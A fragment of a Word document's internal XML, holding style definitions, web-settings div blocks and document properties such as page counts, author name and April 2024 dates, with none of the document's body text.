      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00825934"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00825934"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00825934"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="textlayer--absolute">
    <w:name w:val="textlayer--absolute"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00825934"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D02DF1"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="screenreader-only">
    <w:name w:val="screenreader-only"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D02D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52713">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="959335088">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1030104317">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1472790946">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1537156442">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1543319480">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2029410849">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2111924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md5hashing.net/hash"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7</Pages>
  <Words>1128</Words>
  <Characters>6432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Liu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Xiao Liu</cp:lastModifiedBy>
  <cp:revision>35</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-24T12:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-27T10:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>